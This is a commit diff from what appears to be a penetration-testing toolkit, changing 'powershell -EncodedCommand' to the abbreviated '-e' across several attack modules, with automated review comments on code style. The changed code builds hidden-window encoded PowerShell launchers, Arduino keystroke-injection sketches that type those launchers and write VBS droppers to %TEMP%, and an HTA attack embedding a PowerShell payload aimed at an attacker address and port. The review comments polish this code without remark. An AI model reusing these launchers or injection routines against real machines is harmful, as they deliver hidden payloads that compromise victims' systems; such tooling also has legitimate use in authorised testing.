convert encodedcommand to -e abbreviated
This commit is contained in:
parent
c27dee6ea0
commit
0ff64fcae0
7 changed files with 12 additions and 6 deletions
|
@ -1,3 +1,9 @@
|
|||
~~~~~~~~~~~~~~~~
|
||||
version 7.4.1
|
||||
~~~~~~~~~~~~~~~~
|
||||
|
||||
* converted all powershell encodedcommand to abbreviated
|
||||
|
||||
~~~~~~~~~~~~~~~~
|
||||
version 7.4
|
||||
~~~~~~~~~~~~~~~~
|
||||
|
|
|
@ -262,7 +262,7 @@ def deploy_hex2binary(ipaddr, port, username, password):
|
|||
x86 = file(core.setdir + "x86.powershell").read().rstrip()
|
||||
# x86 = x86.read()
|
||||
|
||||
x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(x86)
|
||||
x86 = "powershell -nop -window hidden -noni -e {0}".format(x86)
|
||||
core.print_status("If you want the powershell commands and attack, "
|
||||
"they are exported to {0}".format(os.path.join(core.setdir + "reports/powershell")))
|
||||
filewrite = open(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
|
||||
|
|
|
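Review bot: The report file on the line `filewrite = open(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w")` is opened without a `with` block, so closing it depends on an explicit `close()` somewhere past the end of this hunk, and the read on `x86 = file(core.setdir + "x86.powershell").read().rstrip()` has no close at all; `file` is also a Python 2-only builtin that raises NameError on Python 3. I would rewrite the read as `with open(core.setdir + "x86.powershell") as fileopen:` / `    x86 = fileopen.read().rstrip()` and the write as `with open(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w") as filewrite:`, moving the write calls that follow under it. The status message builds its path with the single-argument call `os.path.join(core.setdir + "reports/powershell")`, which performs no joining; presumably `os.path.join(core.setdir, "reports/powershell")` was intended, though whether `core.setdir` ends with a separator is not visible here. The same unmanaged handles, `file()` builtin and single-argument `os.path.join` appear in the `try:` hunk below. deploy_hex2binary continues outside this hunk.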
@ -86,7 +86,7 @@ try:
|
|||
#with open(os.path.join(core.setdir + "x86.powershell")) as fileopen:
|
||||
# x86 = fileopen.read()
|
||||
x86 = open(core.setdir + "x86.powershell", "r").read()
|
||||
x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(x86)
|
||||
x86 = "powershell -nop -window hidden -noni -e {0}".format(x86)
|
||||
core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.setdir + "reports/powershell")))
|
||||
filewrite = file(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
|
||||
filewrite.write(x86)
|
||||
|
|
|
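Review bot: The two commented-out lines `#with open(os.path.join(core.setdir + "x86.powershell")) as fileopen:` and `# x86 = fileopen.read()` directly above the live `x86 = open(core.setdir + "x86.powershell", "r").read()` are dead code left in the hunk; they describe the form the live line should take, so either restore them as the active read or delete them rather than keeping both. If they are deleted, a one-line comment such as `# read the generated x86 PowerShell stub and prefix the launcher` would carry the intent they currently hint at. The enclosing `try:` block starts and ends outside this hunk.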
@ -57,7 +57,7 @@ if powershell_menu_choice != "99":
|
|||
# here we format everything for us
|
||||
with open(core.setdir + "/x86.powershell") as fileopen:
|
||||
x86 = fileopen.read()
|
||||
x86 = "powershell -nop -window hidden -noni -EncodedCommand " + x86
|
||||
x86 = "powershell -nop -window hidden -noni -e " + x86
|
||||
core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.setdir, "reports/powershell/")))
|
||||
with open(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w") as filewrite:
|
||||
filewrite.write(x86)
|
||||
|
|
|
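Review bot: The hunk builds the same directory two ways, `os.path.join(core.setdir, "reports/powershell/")` for the status message and `core.setdir + "/reports/powershell/x86_powershell_injection.txt"` for the `open()` call, so the printed location and the written location can drift apart if `core.setdir` ever changes its trailing separator. I would use `os.path.join` for both, e.g. `with open(os.path.join(core.setdir, "reports", "powershell", "x86_powershell_injection.txt"), "w") as filewrite:`. The enclosing `if powershell_menu_choice != "99":` block continues outside the hunk.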
@ -373,7 +373,7 @@ void loop()
|
|||
// run through cmd
|
||||
CommandAtRunBar("cmd");
|
||||
delay(1000);
|
||||
Keyboard.println("powershell -EncodedCommand {powershell_command}");
|
||||
Keyboard.println("powershell -e {powershell_command}");
|
||||
delay(4000);
|
||||
Keyboard.println("echo Set WshShell = CreateObject(\\"WScript.Shell\\") > %TEMP%\\\\{vbs}");
|
||||
Keyboard.println("echo WshShell.Run chr(34) ^& \\"%TEMP%\\\\{bat}\\" ^& Chr(34), 0 >> %TEMP%\\\\{vbs}");
|
||||
|
|
|
@ -174,7 +174,7 @@ void setup()
|
|||
// run through cmd
|
||||
CommandAtRunBar("cmd");
|
||||
delay(1000);
|
||||
Keyboard.println("powershell -EncodedCommand {powershell_command}");
|
||||
Keyboard.println("powershell -e {powershell_command}");
|
||||
// Tweak this delay. Larger files take longer to decode through powershell.
|
||||
delay(10000);
|
||||
Keyboard.println("echo Set WshShell = CreateObject(\\"WScript.Shell\\") > %TEMP%\\\\{vbs}");
|
||||
|
|
|
@ -33,7 +33,7 @@ def gen_hta_cool_stuff():
|
|||
"Generating powershell injection code and x86 downgrade attack...")
|
||||
ps = generate_powershell_alphanumeric_payload(
|
||||
selection, ipaddr, port, "x86")
|
||||
command = ("powershell -window hidden -EncodedCommand " + ps)
|
||||
command = ("powershell -window hidden -e " + ps)
|
||||
# hta code here
|
||||
print_status("Embedding HTA attack vector and PowerShell injection...")
|
||||
# grab cloned website
|
||||
|
|
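Review bot: The new line `command = ("powershell -window hidden -e " + ps)` wraps a plain concatenation in redundant parentheses, which reads as a leftover from an implicit line continuation; `command = "powershell -window hidden -e " + ps` says the same thing. A short comment stating that `ps` is expected to be the already-encoded payload string returned by generate_powershell_alphanumeric_payload would help here, since that function's contract is not visible in the hunk. gen_hta_cool_stuff continues outside this hunk.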